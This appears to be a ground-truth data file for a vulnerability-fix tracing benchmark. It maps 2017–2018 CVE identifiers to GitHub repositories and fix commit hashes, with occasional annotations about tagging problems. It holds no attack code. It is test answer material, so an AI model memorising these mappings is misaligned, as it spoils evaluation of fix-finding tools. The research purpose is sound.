+CVE-2017-8658;https://github.com/chakra-core/ChakraCore;None:None;False;d08f260e7edabb2d4f90fd733b01eeaca1915222,63034a01dc508f27ced7099c9cc97babc4aebc1f,2500e1cdc12cb35af73d5c8c9b85656aba6bab4d,5c6fbc61ccc57826e0daaf07a71c2c536614c2ad; +CVE-2017-8932;https://github.com/golang/go;None:None;False;9294fa2749ffee7edbbb817a0ef9fe633136fa9c; +CVE-2017-9096;https://github.com/albfernandez/itext2;None:None;False;ad4259e57412f4b538df3a57c55e814cfe748a72; +CVE-2017-9214;https://github.com/openvswitch/ovs;None:None;False;7b7b186a8d40fc6f287cef2582702181da74bdc3,fafbfa6ea46911aeb0083f166fed215ca71e22b6; +CVE-2017-9265;https://github.com/openvswitch/ovs;None:None;False;1752ea92dc11935e0595d208fdfe8203baf5b55c,050f90662dde1da1ee3cdd209a9b65196a808811; +CVE-2017-9796;https://github.com/apache/geode;None:None;False;02b9646618e074f80b3d5fed0e5b512a34b5897a; +CVE-2017-9841;https://github.com/sebastianbergmann/phpunit;None:None;False;0c1ae1b5324fa10f96129c5679b788cc1ca9468e,284a69fb88a2d0845d23f42974a583d8f59bf5a5; +CVE-2017-10910;https://github.com/mqttjs/MQTT.js;None:None;False;403ba53b838f2d319a0c0505a045fe00239e9923,3323089ee777fcbf2281a3f3a965e2a4cd7c9ad9; +CVE-2017-11173;https://github.com/cyu/rack-cors;None:None;False;42ebe6caa8e85ffa9c8a171bda668ba1acc7a5e6; +CVE-2017-11424;https://github.com/jpadilla/pyjwt;None:None;False;11f30c4050a11b6398d38f505578c9dabeba6c78,37926ea0dd207db070b45473438853447e4c1392; +CVE-2017-11427;https://github.com/onelogin/python-saml;None:None;False;fad881b4432febea69d70691dfed51c93f0de10f; +CVE-2017-11428;https://github.com/onelogin/ruby-saml;None:None;False;048a544730930f86e46804387a6b6fad50d8176f,d7ce607d9f9d996e1046dde09b675c3cf0c01280,a35f7251b86aa3b7caf4a64d8a3451f925e8855c,03af9e33d2d87f4ac9a644c5b0981ded4dca0bb8; +CVE-2017-11467;https://github.com/orientechnologies/orientdb;None:None;False;200535c3183f7db88ee4526bf3316d6bdeddb68e; +CVE-2017-11503;https://github.com/PHPMailer/PHPMailer;None:None;False;dbbc1397c41de56aa3a57c8188d19a345dea5c63; commit timespamt is outside the time interval +CVE-2017-11610;https://github.com/Supervisor/supervisor;None:None;False;dbe0f55871a122eac75760aef511efc3a8830b88,aac3c21893cab7361f5c35c8e20341b298f6462e,90c5df80777bfec03d041740465027f83d22e27b,83060f3383ebd26add094398174f1de34cf7b7f0,058f46141e346b18dee0497ba11203cb81ecb19e; +CVE-2017-11905;https://github.com/chakra-core/ChakraCore;None:None;False;d97375c40cfd2b2376a5c4b6cd34098e1e99e1f1; +CVE-2017-11910;https://github.com/chakra-core/ChakraCore;None:None;False;40232a443c6316a58941572b0a4776b0677975ca; +CVE-2017-12098;https://github.com/sferik/rails_admin;None:None;False;44f09ed72b5e0e917a5d61bd89c48d97c494b41c; +CVE-2017-12158;https://github.com/keycloak/keycloak;None:None;False;d9ffc4fa211bbf2aae49449cb58e02b6ea8cd299,6ea9ed9be8baa7c6971cfbdabecc91555dc561d7; +CVE-2017-12159;https://github.com/keycloak/keycloak;None:None;False;9b75b603e3a5f5ba6deff13cbb45b070bf2d2239,e201f205d162d4d795d294fe065ca20f4005eef2; +CVE-2017-12160;https://github.com/keycloak/keycloak;None:None;False;fea4c54adc6a1fdafb725b89874c389d54b6d04a,96fe4608066d533cc1ff69f23339a710a60e892d; +CVE-2017-12605;https://github.com/opencv/opencv;None:None;False;999f41fb4f4aa94a0cb47256919ae8b5c29ca5f3,72d29259ca741950527c8cca7fb649030c01f658,30f7576029deb8c125ae7688dd57cfa2156a6b72,f0fb665407a1162153930de1ab5a048a4f3d60f9; +CVE-2017-12616;https://github.com/apache/tomcat;None:None;False;07dc0ea2745f0afab6415f22b16a29f1c6de5727; +CVE-2017-12620;https://github.com/apache/opennlp;None:None;False;c2c14e9af7a519aacfde5173f641c86e17ce50ed; +CVE-2017-12622;https://github.com/apache/geode;None:None;False;db4a493efc09600bf0a9778d5274c09b23b16644; +CVE-2017-12624;https://github.com/apache/cxf;None:None;False;a2ce435cf0eedc8158d118d6d275114408d2a376,896bd961cbbb6b8569700e5b70229f78f94ad9dd,8bd915bfd7735c248ad660059c6b6ad26cdbcdf6; +CVE-2017-12629;https://github.com/apache/lucene-solr;None:None;False;926cc4d65b6d2cc40ff07f76d50ddeda947e3cc4,f9fd6e9e26224f26f1542224ce187e04c27b2681,3bba91131b5257e64b9d0a2193e1e32a145b2a23,d8000beebfb13ba0b6e754f84c760e11592d8d14; +CVE-2017-12631;https://github.com/apache/cxf-fediz;None:None;False;e7127129dbc0f4ee83985052085e185e750cebbf,48dd9b68d67c6b729376c1ce8886f52a57df6c45,ccdb12b26ff89e0a998a333e84dd84bd713ac76c; +CVE-2017-12867;https://github.com/simplesamlphp/simplesamlphp;None:None;False;608f24c2d5afd70c2af050785d2b12f878b33c68; +CVE-2017-12868;https://github.com/simplesamlphp/simplesamlphp;None:None;False;caf764cc2c9b68ac29741070ebdf133a595443f1,4bc629658e7b7d17c9ac3fe0da7dc5df71f1b85e; +CVE-2017-12871;https://github.com/simplesamlphp/simplesamlphp;None:None;False;77df6a932d46daa35e364925eb73a175010dc904; +CVE-2017-12873;https://github.com/simplesamlphp/simplesamlphp;None:None;False;a890b60438d4c8bcdcfd770361aedbbe64ad4c74,8cd71966fbd55b7fd67ca8c849eaf1df7ab42462,baba857afb874d8d6cac0fd8e976ff2859a6cd60,90dca835158495b173808273e7df127303b8b953,300d8aa48fe93706ade95be481c68e9cf2f32d1f,e2daf4ceb6e580815c3741384b3a09b85a5fc231; +CVE-2017-13098;https://github.com/bcgit/bc-java;None:None;False;a00b684465b38d722ca9a3543b8af8568e6bad5c; +CVE-2017-14063;https://github.com/AsyncHttpClient/async-http-client;None:None;False;e9f12b29725c567cdb4de98b3302a61ca9d41280,eb9e3347e45319be494db24d285a2aee4396f5d3; +CVE-2017-14136;https://github.com/opencv/opencv;None:None;False;df1a0263299d2875eb51e85351b58d354304da22,aacae2065744adb05e858d327198c7bbe7f452b0; +CVE-2017-14506;https://github.com/geminabox/geminabox;None:None;False;5464f0cebd2e82fbd9fc321d7b5053982429c055,99aaae196c4fc6ae0df28e186ca1e493ae658e02; +CVE-2017-14619;https://github.com/thorsten/phpMyFAQ;None:None;False;30b0025e19bd95ba28f4eff4d259671e7bb6bb86; +CVE-2017-14623;https://github.com/go-ldap/ldap;None:None;False;95ede1266b237bf8e9aa5dce0b3250e51bfefe66,bb09d4b178012d5af4dd3ef600c6ef2b74b639a1; +CVE-2017-14683;https://github.com/geminabox/geminabox;None:None;False;0dc203b6cef5b9f379f2ef6a24a723f852589ee2,a01c4e8b3403624109499dec75eb6ee30bd01a55; +CVE-2017-14695;https://github.com/saltstack/salt;None:None;False;80d90307b07b3703428ecbb7c8bb468e28a9ae6d,206ae23f15cb7ec95a07dee4cbe9802da84f9c42,9ba1f6112fa72627b42eed4c4eea439dce2df31c,31b38f50ebf321a1d14af0868c516a5de865f5a8; +CVE-2017-14735;https://github.com/nahsra/antisamy;None:None;False;e76f02a77afb4e43b897f13d17b5bc1260b8afde; +CVE-2017-15051;https://github.com/nilsteampassnet/teampass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; +CVE-2017-15052;https://github.com/nilsteampassnet/TeamPass;None:None;False;8f2d51dd6c24f76e4f259d0df22cff9b275f2dd1; +CVE-2017-15053;https://github.com/nilsteampassnet/TeamPass;None:None;False;ef32e9c28b6ddc33cee8a25255bc8da54434af3e; +CVE-2017-15054;https://github.com/nilsteampassnet/TeamPass;None:None;False;9811c9d453da4bd1101ff7033250d1fbedf101fc; +CVE-2017-15055;https://github.com/nilsteampassnet/TeamPass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; +CVE-2017-15103;https://github.com/heketi/heketi;None:None;False;ed6e9fdecab5994de12547e369af11d0dae18e76,787bae461b23003a4daa4d1d639016a754cf6b00; +CVE-2017-15133;https://github.com/miekg/dns;None:None;False;43913f2f4fbd7dcff930b8a809e709591e4dd79e; +CVE-2017-15278;https://github.com/nilsteampassnet/TeamPass;None:None;False;f5a765381f051fe624386866ddb1f6b5e7eb929b; +CVE-2017-15288;https://github.com/scala/scala;None:None;False;67fcf5ce4496000574676d81ed72e4a6cb9e7757,f3419fc358a8ea6e366538126279da88d4d1fb1f,0f624c5e5bdb39967e208c7c16067c3e6c903f1f,67e1437e55df6789d0883cb8846d12071de75c63,b64ad85d1cfdfff29d0836a66736d6d2b0830c0e; +CVE-2017-15612;https://github.com/lepture/mistune;None:None;False;ab8f7de8bc78c2a88f9e01522b8a3a0aa8cd9416,d6f0b6402299bf5a380e7b4e77bd80e8736630fe; +CVE-2017-15703;https://github.com/apache/nifi;None:None;False;9e2c7be7d3c6a380c5f61074d9a5a690b617c3dc; was 1.4.0.1.5.0 +CVE-2017-15720;https://github.com/apache/airflow;None:None;False;4cf904cf5a7a070bbeaf3a0e985ed2b840276015; +CVE-2017-15728;https://github.com/thorsten/phpMyFAQ;None:None;False;2d2a85b59e058869d7cbcfe2d73fed4a282f2e5b; +CVE-2017-15729;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; +CVE-2017-15730;https://github.com/thorsten/phpMyFAQ;None:None;False;cce47f94375bb0102ab4f210672231dbb854dd0d; +CVE-2017-15731;https://github.com/thorsten/phpMyFAQ;None:None;False;fadb9a70b5f7624a6926b8834d5c6001c210f09c; +CVE-2017-15733;https://github.com/thorsten/phpMyFAQ;None:None;False;ef5a66df4bcfacc7573322af33ce10c30e0bb896; +CVE-2017-15734;https://github.com/thorsten/phpMyFAQ;None:None;False;fa26c52384b010edaf60c525ae5b040f05da9f77; +CVE-2017-15735;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; +CVE-2017-15808;https://github.com/thorsten/phpMyFAQ;None:None;False;a249b4645fb86f6a9fbe5d2344ab1cbdb906b75c; +CVE-2017-15809;https://github.com/thorsten/phpMyFAQ;None:None;False;cb648f0d5690b81647dd5c9efe942ebf6cce7da9; +CVE-2017-15879;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; versions/tags do not contain the commit at all (it is a mess) +CVE-2017-15914;https://github.com/borgbackup/borg;None:None;False;75854c1243b29ec5558be6fdefe365cd438abb4c,ea0203bb0de557cd29de5ab0a0efe5f6015ca59d; +CVE-2017-15928;https://github.com/ohler55/ox;None:None;False;e4565dbc167f0d38c3f93243d7a4fcfc391cbfc8; +CVE-2017-16003;https://github.com/felixrieseberg/windows-build-tools;None:None;False;9835d33e68f2cb5e4d148e954bb3ed0221d98e90; +CVE-2017-16006;https://github.com/jonschlinkert/remarkable;None:None;False;43eaf67dd3bb4a850542ad868b59fe75409a17a7,49e24e8f2a431c095ddbb74ecb67cf1cf8f88c47,92d79a99c39a29665f7f4fabc9593f1b30924ca9,49e87b7ae2dc323d83606792a749fb207595249e; +CVE-2017-16007;https://github.com/cisco/node-jose;None:None;False;f92cffb4a0398b4b1158be98423369233282e0af; +CVE-2017-16008;https://github.com/i18next/i18next;None:None;False;34e8e13a2b64708a0aed01092e4dbfd0e5013831; +CVE-2017-16010;https://github.com/i18next/i18next;None:None;False;11f059599889d857d497aa0499355be32df0dbb6,d367309d4427c2d651b0f0b304504cf59c056cab; +CVE-2017-16013;https://github.com/hapijs/hapi;None:None;False;770cc7bad15122f796d938738b7c05b66d2f4b7f; +CVE-2017-16014;https://github.com/http-party/node-http-proxy;None:None;False;07c8d2ee6017264c3d4deac9f42ca264a3740b48; +CVE-2017-16015;https://github.com/caolan/forms;None:None;False;bc01e534a0ff863dedb2026a50bd03153bbc6a5d; +CVE-2017-16016;https://github.com/apostrophecms/sanitize-html;None:None;False;5d205a1005ba0df80e21d8c64a15bb3accdb2403; +CVE-2017-16017;https://github.com/apostrophecms/sanitize-html;None:None;False;7a1deb341b8a9cef807269a1bbcc61207752ea2b; +CVE-2017-16018;https://github.com/restify/node-restify;None:None;False;24c57cef13dced488ca698db72b851cecd687924,d3837a925727d18b03fcd55ecdd534d8a7888d4e,0af5ccab0f3cd779bd2fc30c774c4a4557cd7cc1,a015067232ad62aa035675dc63a46dce31fed3f3; +CVE-2017-16023;https://github.com/sindresorhus/decamelize;None:None;False;76d47d8de360afb574da2e34db87430ce11094e0; +CVE-2017-16025;https://github.com/hapijs/nes;None:None;False;249ba1755ed6977fbc208463c87364bf884ad655; +CVE-2017-16026;https://github.com/request/request;None:None;False;3d31d4526fa4d4e4f59b89cabe194fb671063cdb,29d81814bc16bc79cb112b4face8be6fc00061dd,8902ce12ffed9bf65b3ccc73203f0bc390f156ea; +CVE-2017-16029;https://github.com/henrytseng/hostr;None:None;False;789a00047459fd80b6f0a9701a1378a47fb73ba8; Prospector wrongly retrieves the previous tag as the same to the next one (to fix) +CVE-2017-16031;https://github.com/socketio/socket.io;None:None;False;67b4eb9abdf111dfa9be4176d1709374a2b4ded8,de1afe13172529801e1e091a471441e11ffd85a3; +CVE-2017-16042;https://github.com/tj/node-growl;None:None;False;d71177d5331c9de4658aca62e0ac921f178b0669; vulnerable tag is fixed +CVE-2017-16083;https://github.com/sandy98/node-simple-router;None:None;False;dfdd52e2e80607af433097d940b3834fd96df488; 0.10.0 tag does not exist +CVE-2017-16084;https://github.com/KoryNunn/list-n-stream;None:None;False;99b0b40b34aaedfcdf25da46bef0a06b9c47fb59; this repo has no tags +CVE-2017-16107;https://github.com/Eeems/PooledWebSocket;None:None;False;7b3b4e5c6be6d8a964296fa3c50e38dc07e9701d; +CVE-2017-16136;https://github.com/expressjs/method-override;None:None;False;4c58835a61fdf7a8e070d6f8ecd5379a961d0987; +CVE-2017-16138;https://github.com/broofa/mime;None:None;False;855d0c4b8b22e4a80b9401a81f2872058eae274d,1df903fdeb9ae7eaa048795b8d580ce2c98f40b0; +CVE-2017-16226;https://github.com/browserify/static-eval;None:None;False;c06f1b8c0a0cd1cc989c025fbb4c5776fc661c2c; +CVE-2017-16228;https://github.com/dulwich/dulwich;None:None;False;7116a0cbbda571f7dac863f4b1c00b6e16d6d8d6; +CVE-2017-16244;https://github.com/octobercms/october;None:None;False;4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0; +CVE-2017-16558;https://github.com/contao/contao;None:None;False;6b4a2711edf166c85cfd7a53fed6aea56d4f0544,501cb3cd34d61089b94e7ed78da53977bc71fc3e; +CVE-2017-16570;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; How? Prospector finds f08baa4fb4084b7ec9f356d313dcfd6d7d7d0f8b which is the merge commit dated 2017 while the GT has the commits +CVE-2017-16613;https://github.com/openstack-archive/swauth;None:None;False;70af7986265a3defea054c46efc82d0698917298; +CVE-2017-16615;https://github.com/thanethomson/MLAlchemy;None:None;False;bc795757febdcce430d89f9d08f75c32d6989d3c; +CVE-2017-16616;https://github.com/Stranger6667/pyanyapi;None:None;False;810db626c18ebc261d5f4299d0f0eac38d5eb3cf; +CVE-2017-16618;https://github.com/tadashi-aikawa/owlmixin;None:None;False;5d0575303f6df869a515ced4285f24ba721e0d4e; +CVE-2017-16759;https://github.com/librenms/librenms;None:None;False;7887b2e1c7158204ac69ca43beafce66e4d3a3b4,d3094fa6578b29dc34fb5a7d0bd6deab49ecc911; +CVE-2017-16762;https://github.com/sanic-org/sanic;None:None;False;18829e648a26d947b7e441a9d7d012a24b0adf48,ae09dec05e10816b37eed425c87e193d230c5a73,afd51e0823524eec683b226a20f40d958253064f; +CVE-2017-16792;https://github.com/geminabox/geminabox;None:None;False;e7e0b16147677e9029f0b55eff6bc6dda52398d4,f8429a9e364658459add170e4ebc7a5d3b4759e7; +CVE-2017-16876;https://github.com/lepture/mistune;None:None;False;5f06d724bc05580e7f203db2d4a4905fc1127f98; +CVE-2017-16877;https://github.com/vercel/next.js;None:None;False;02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00; commit timestamp is outside the time interval +CVE-2017-16880;https://github.com/filp/whoops;None:None;False;c16791d28d1ca3139e398145f0c6565c523c291a; +CVE-2017-17042;https://github.com/lsegal/yard;None:None;False;b0217b3e30dc53d057b1682506333335975e62b4; +CVE-2017-17485;https://github.com/FasterXML/jackson-databind;None:None;False;f031f27a31625d07922bdd090664c69544200a5d,978798382ceb72229e5036aa1442943933d6d171,bb45fb16709018842f858f1a6e1118676aaa34bd,2235894210c75f624a3d0cd60bfb0434a20a18bf; +CVE-2017-17760;https://github.com/opencv/opencv;None:None;False;70d49446e99f4caf701e4b007157ef41751bfb46,7bbe1a53cfc097b82b1589f7915a2120de39274c; +CVE-2017-17835;https://github.com/apache/airflow;None:None;False;6aca2c2d395952341ab1b201c59011920b5a5c77; commit timestamp is outside the time interval +CVE-2017-17837;https://github.com/apache/deltaspike;None:None;False;72e607f3be66c30c72b32c24b44e9deaa8e54608,4e2502358526b944fc5514c206d306e97ff271bb,d95abe8c01d256da2ce0a5a88f4593138156a4e5; +CVE-2017-18076;https://github.com/omniauth/omniauth;None:None;False;71866c5264122e196847a3980c43051446a03e9b,61df4e8198b2b33600830e00eaaae0ac0c4cabec; +CVE-2017-18077;https://github.com/juliangruber/brace-expansion;None:None;False;b13381281cead487cbdbfd6a69fb097ea5e456c3,ed46e5ba619bd938e5b84835fca00eed0adc5585; +CVE-2017-18239;https://github.com/jasongoodwin/authentikat-jwt;None:None;False;2d2fa0d40ac8f2f7aa7e9b070fa1a25eee082cb0; +CVE-2017-18361;https://github.com/Pylons/colander;None:None;False;1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046,d4f4f77a2cfa518426178bd69d2b29dee57f770d,98805557c10ab5ff3016ed09aa2d48c49b9df40b; +CVE-2017-18367;https://github.com/seccomp/libseccomp-golang;None:None;False;06e7a29f36a34b8cf419aeb87b979ee508e58f9e; +CVE-2017-18635;https://github.com/novnc/noVNC;None:None;False;6048299a138e078aed210f163111698c8c526a13,15ce2f71eb660c03237a58a589cd8ad84aa7f20d; +CVE-2017-1000001;https://github.com/fedora-infra/fedmsg;None:None;False;5c21cf88a24fac4c15340cfd68d6d7599ad4a4a2,2bb51cd8e7b2122b04421280ecc6e2db499f1170; +CVE-2017-1000042;https://github.com/mapbox/mapbox.js;None:None;False;538d229ab6767bb4c3f3969c417f9884189c1512,275e404057b221edd276b175e0165f23595ad35a; +CVE-2017-1000056;https://github.com/kubernetes/kubernetes;None:None;False;6f9074f06945247827499b196e0c5c23af1f5c72,ec040ef2521c8a67cc44e9ed323cbf0053268798,dd7561801aa7b7f00f1556d38a14488246821d91,52f6d3fbfb339605bb54bf04c5d8f6f4adc518f6,7fef0a4f6a44ea36f166c39fdade5324eff2dd5e; +CVE-2017-1000069;https://github.com/bitly/oauth2_proxy;None:None;False;4464655276877f1951fddf238cdfeca3cbca83ef,55085d9697962668fd4e43e8e4644144fe83cd93; +CVE-2017-1000070;https://github.com/bitly/oauth2_proxy;None:None;False;86d083266b747825a05f639560141e542019cf26,289a6ccf463a425c7606178c510fc5eeb9c8b050; +CVE-2017-1000188;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; +CVE-2017-1000189;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; +CVE-2017-1000209;https://github.com/TakahikoKawasaki/nv-websocket-client;None:None;False;a158795432699ff06568b66517db2ca9fde282b2,feb9c8302757fd279f4cfc99cbcdfb6ee709402d,fb23d30966b8abba920fa90b49201192c66f56bf; vulnerable tag is fixed +CVE-2017-1000228;https://github.com/mde/ejs;None:None;False;3d447c5a335844b25faec04b1132dbc721f9c8f6; +CVE-2017-1000246;https://github.com/IdentityPython/pysaml2;None:None;False;7323f5c20efb59424d853c822e7a26d1aa3e84aa,79d679883f0b198511ea5eeaaf53f1f625e8d938; +CVE-2017-1000248;https://github.com/redis-store/redis-store;None:None;False;ce13252c26fcc40ed4935c9abfeb0ee0761e5704,e0c1398d54a9661c8c70267c3a925ba6b192142e; +CVE-2017-1000389;https://github.com/jenkinsci/global-build-stats-plugin;None:None;False;8322b1333329f418ea89f7c3a1528b976f6a1ede; +CVE-2017-1000427;https://github.com/markedjs/marked;None:None;False;cd2f6f5b7091154c5526e79b5f3bfb4d15995a51,8f9d0b72f5606ed32057049f387161dd41c36ade; +CVE-2017-1000431;https://github.com/ezsystems/ezpublish-legacy;None:None;False;c7174295fa0b9bd81bd4af908082464b0b80f278; version is not a git tag +CVE-2017-1000433;https://github.com/IdentityPython/pysaml2;None:None;False;efe27e2f40bf1c35d847f935ba74b4b86aa90fb5,6312a41e037954850867f29d329e5007df1424a5; +CVE-2017-1000450;https://github.com/opencv/opencv;None:None;False;c58152d94ba878b2d7d76bcac59146312199b9eb,a729f985fdc23cd30f3e45909bd627bca1d53c6c,0202e527476daceec544e63068742f70d1dfe934,08a5fe3661b4cab8758e289927cfdc96c10458da,e15a56d142906aea4e7c009d28d7432c0f1cb3a1,c46521ad65bb7c8d5c55a9f696b6bd52acdd17b8; +CVE-2017-1000451;https://github.com/vvakame/fs-git;None:None;False;eb5f70efa5cfbff1ab299fa7daaa5de549243998; +CVE-2017-1000486;https://github.com/primefaces/primefaces;None:None;False;26e44eb7962cbdb6aa2f47eca0f230f3274358f0; +CVE-2017-1000487;https://github.com/codehaus-plexus/plexus-utils;None:None;False;b38a1b3a4352303e4312b2bb601a0d7ec6e28f41; +CVE-2017-1000491;https://github.com/rhysd/Shiba;None:None;False;e8a65b0f81eb04903eedd29500d7e1bedf249eab; +CVE-2017-1001002;https://github.com/josdejong/mathjs;None:None;False;8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90; +CVE-2017-1001003;https://github.com/josdejong/mathjs;None:None;False;a60f3c8d9dd714244aed7a5569c3dccaa3a4e761; +CVE-2017-1001004;https://github.com/josdejong/typed-function;None:None;False;6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe; +CVE-2017-1002150;https://github.com/fedora-infra/python-fedora;None:None;False;b27f38a67573f4c989710c9bfb726dd4c1eeb929; +CVE-2018-0737;https://github.com/openssl/openssl;None:None;False;6939eab03a6e23d2bd2c3f5e34fe1d48e542e787,54f007af94b8924a46786b34665223c127c19081,349a41da1ad88ad87825414752a8ff5fdd6a6c3f; +CVE-2018-0953;https://github.com/chakra-core/ChakraCore;None:None;False;71d7b389a8e01f1f29bff7202270f5ce1d63696a; +CVE-2018-1067;https://github.com/undertow-io/undertow;None:None;False;cc5b9bfb1a516e0102b7a2890277d1ba3132bc67,85d4478e598105fe94ac152d3e11e388374e8b86,f404cb68448c188f4d51b085b7fe4ac32bde26e0; +CVE-2018-1098;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers +CVE-2018-1099;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers +CVE-2018-1114;https://github.com/undertow-io/undertow;None:None;False;7f22aa0090296eb00280f878e3731bb71d40f9eb,882d5884f2614944a0c2ae69bafd9d13bfc5b64a; +CVE-2018-1193;https://github.com/cloudfoundry/gorouter;None:None;False;6734f35425ce1525660f7b231e030f2660eaf668,11d9b6ebcd319bb25b0e4ceb0b7628381a283785; +CVE-2018-1196;https://github.com/spring-projects/spring-boot;None:None;False;9b8cb9a4639af3b47b5eeec4f5a04261dcd2a058; +CVE-2018-1199;https://github.com/spring-projects/spring-security;None:None;False;65da28e4bf62f58fb130ba727cbbd621b44a36d1,0eef5b4b425ab42b9fa0fde1a3f36a37b92558f2,cb8041ba67635edafcc934498ef82707157fd22a; +CVE-2018-1259;https://github.com/spring-projects/spring-data-commons;None:None;False;b8974a292ab463a304eda987632be4d9c145f5f8,11d0aa1b396d8819a5a0d4933c5cfc72fe9ad102,fd94d3145d6cd2c41b07cdc76d6aa84319c1ad4d; +CVE-2018-1260;https://github.com/spring-projects/spring-security-oauth;None:None;False;70e5ba84ca98b7ab42c1900bdd9fa51b393d611f; +CVE-2018-1261;https://github.com/spring-projects/spring-integration-extensions;None:None;False;a5573eb232ff85199ff9bb28993df715d9a19a25; +CVE-2018-1263;https://github.com/spring-projects/spring-integration-extensions;None:None;False;d10f537283d90eabd28af57ac97f860a3913bf9b; +CVE-2018-1272;https://github.com/spring-projects/spring-framework;None:None;False;ab2410c754b67902f002bfcc0c3895bd7772d39f,e02ff3a0da50744b0980d5d665fd242eedea7675; +CVE-2018-1273;https://github.com/spring-projects/spring-data-commons;None:None;False;08d748a6fd0173a8ba0aa1f240c38afbdaf4ad9f,b1a20ae1e82a63f99b3afc6f2aaedb3bf4dc432a,ae1dd2741ce06d44a0966ecbd6f47beabde2b653; +CVE-2018-1274;https://github.com/spring-projects/spring-data-commons;None:None;False;06b0dab536963da78dadf2ba407e5937d81c348a,371f6590c509c72f8e600f3d05e110941607fbad,3d8576fe4e4e71c23b9e6796b32fd56e51182ee0; +CVE-2018-1284;https://github.com/apache/hive;None:None;False;cbcd846b7dee541595ceebdfb8ae367c11b1e666,f80a38ae1174553022deae4f8774918401d9756d,b0a58d245875dc1b3ac58a7cf1a61d3b17805e96; +CVE-2018-1304;https://github.com/apache/tomcat;None:None;False;723ea6a5bc5e7bc49e5ef84273c3b3c164a6a4fd,2d69fde135302e8cff984bb2131ec69f2e396964,5af7c13cff7cc8366c5997418e820989fabb8f48; +CVE-2018-1309;https://github.com/apache/nifi;None:None;False;28067a29fd13cdf8e21b440fc65c6dd67872522f; +CVE-2018-1314;https://github.com/apache/hive;None:None;False;c39b5d1bc3011cf900db4e7911232c1d0fb7f576,3b1d4fdfdfecbf162b60ec0e49a07595a8a51e79; commit timestamp is outside the time interval +CVE-2018-1320;https://github.com/apache/thrift;None:None;False;d973409661f820d80d72c0034d06a12348c8705e; +CVE-2018-1336;https://github.com/apache/tomcat;None:None;False;92cd494555598e99dd691712e8ee426a2f9c2e93; +CVE-2018-1339;https://github.com/apache/tika;None:None;False;1b6ca3685c196cfd89f5f95c19cc919ce10c5aff,ffb48dd29d0c2009490caefda75e5b57c7958c51; +CVE-2018-3711;https://github.com/fastify/fastify;None:None;False;7f2b88f7f523698b8bf258f8235c400af4532097,fabd2a011f2ffbb877394abe699f549513ffbd76,c42fd308d82aa57eb15a41d7dd60a2351302c64a,79edc6b8b726bcc2d394fc83479f14e9c5c10b34; +CVE-2018-3712;https://github.com/vercel/serve;None:None;False;6adad6881c61991da61ebc857857c53409544575; +CVE-2018-3714;https://github.com/nim579/node-srv;None:None;False;15be996c0520ac6e4dee0cf0808fc7e72effd2a2; +CVE-2018-3715;https://github.com/jarofghosts/glance;None:None;False;8cfd88e44ebd3f07e3a2eaf376a3e758b6c4ca19; +CVE-2018-3721;https://github.com/lodash/lodash;None:None;False;d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a; +CVE-2018-3726;https://github.com/omphalos/crud-file-server;None:None;False;4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa; +CVE-2018-3728;https://github.com/hapijs/hoek;None:None;False;32ed5c9413321fbc37da5ca81a7cbab693786dee,5aed1a8c4a3d55722d1c799f2368857bf418d6df,623667e4ed606841137af84173c588667c8e882d; +CVE-2018-3731;https://github.com/tnantoka/public;None:None;False;eae8ad8017b260f8667ded5e12801bd72b877af2; this repo has no tag, +CVE-2018-3732;https://github.com/pillarjs/resolve-path;None:None;False;fe5b8052cafd35fcdafe9210e100e9050b37d2a0; +CVE-2018-3733;https://github.com/omphalos/crud-file-server;None:None;False;4fc3b404f718abb789f4ce4272c39c7a138c7a82; +CVE-2018-3738;https://github.com/protobufjs/protobuf.js;None:None;False;2ee1028d631a328e152d7e09f2a0e0c5c83dc2aa; +CVE-2018-3740;https://github.com/rgrove/sanitize;None:None;False;01629a162e448a83d901456d0ba8b65f3b03d46e; +CVE-2018-3741;https://github.com/rails/rails-html-sanitizer;None:None;False;f3ba1a839a35f2ba7f941c15e239a1cb379d56ae; +CVE-2018-3743;https://github.com/herber/hekto;None:None;False;408dd526e706246e2c2f378580c66036b768520e,1e5c75f8259ba0daf9b2600db3c246cda1934c46; +CVE-2018-3750;https://github.com/unclechu/node-deep-extend;None:None;False;9423fae877e2ab6b4aecc4db79a0ed63039d4703; +CVE-2018-3757;https://github.com/roest01/node-pdf-image;None:None;False;54679496a89738443917608c2bbe2f6e5dd20e83,15c13846a966c8513e30aff58471163a872b3b6d; +CVE-2018-3758;https://github.com/mrvautin/expressCart;None:None;False;65b18cfe426fa217aa6ada1d4162891883137893; +CVE-2018-3759;https://github.com/jtdowney/private_address_check;None:None;False;4068228187db87fea7577f7020099399772bb147; +CVE-2018-3769;https://github.com/ruby-grape/grape;None:None;False;6876b71efc7b03f7ce1be3f075eaa4e7e6de19af; +CVE-2018-3774;https://github.com/unshiftio/url-parse;None:None;False;53b1794e54d0711ceb52505e0f74145270570d5a; +CVE-2018-3777;https://github.com/restforce/restforce;None:None;False;fd31f1cb09d8363a27e6786ba1754941a1980eed,9765e0dd9b0e5408b4390aa51962641731d282d5; +CVE-2018-3778;https://github.com/moscajs/aedes;None:None;False;ffbc1702bb24b596afbb96407cc6db234a4044a8; fixed version is vulnerable (changed) +CVE-2018-3786;https://github.com/eggjs/egg-scripts;None:None;False;b98fd03d1e3aaed68004b881f0b3d42fe47341dd; 